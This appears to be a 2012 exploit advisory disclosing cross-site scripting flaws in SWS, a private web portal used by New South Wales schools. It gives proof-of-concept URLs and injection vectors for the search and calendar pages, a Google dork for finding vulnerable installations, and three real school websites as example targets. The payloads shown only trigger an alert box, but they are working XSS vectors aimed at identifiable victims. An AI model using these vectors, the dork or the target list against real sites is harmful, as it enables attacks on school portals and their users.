=============================================================== = # Exploit Title: SWS - Cross Site Scripting vulnerabilities = = # Date: 23/04/2012 = = # Author: Phizo = = # Manufacturer: www.schoolwebsitesolutions.com = = # Version: Latest (Private software, no version number) = = # Category: webapps = = # Google dork: inurl:schools.nsw.edu.au/sws/ = = # Tested on: Windows 7 & Ubuntu 10.04 - (Firefox 11.0) = =============================================================== [+] Information: SWS is a private portal software created for NSW schools only, hence why I could not gather details such as the version of the software. Multiple XSS vulnerabilities will be shown to show the insecurity of the portal software. [+] Details: ======== Search -- (Value contained within script tags) ======== # PoC: http://victim/search?search=[XSS] # Vulnerable code: a.execute("VALUE"); -- VALUE is the value of user input. # Vector used: '); alert("XSS"); (' # Output: a.execute("");alert("XSS");(""); ========== Calendar ========== # PoC: http://victim/calendar?p_p_col_count=3&p_p_col_id=column-1&p_p_col_pos=2&p_p_id=eppvanillacalendarportlet_WAR_eppvanilladefaultportlet&p_p_lifecycle=0&p_p_mode=view&p_p_state=normal&startdate=23-3-2012">[XSS] # Vulnerable code: (multiple hyperlinks, however I will provide one). Print this page # Vector used: "> # Output: &print=true" target="_blank" class="printmonth">Print this page [+] Example sites: http://www.cook-s.schools.nsw.edu.au/ http://www.lawrenceha-s.schools.nsw.edu.au/ http://www.parameadow-s.schools.nsw.edu.au/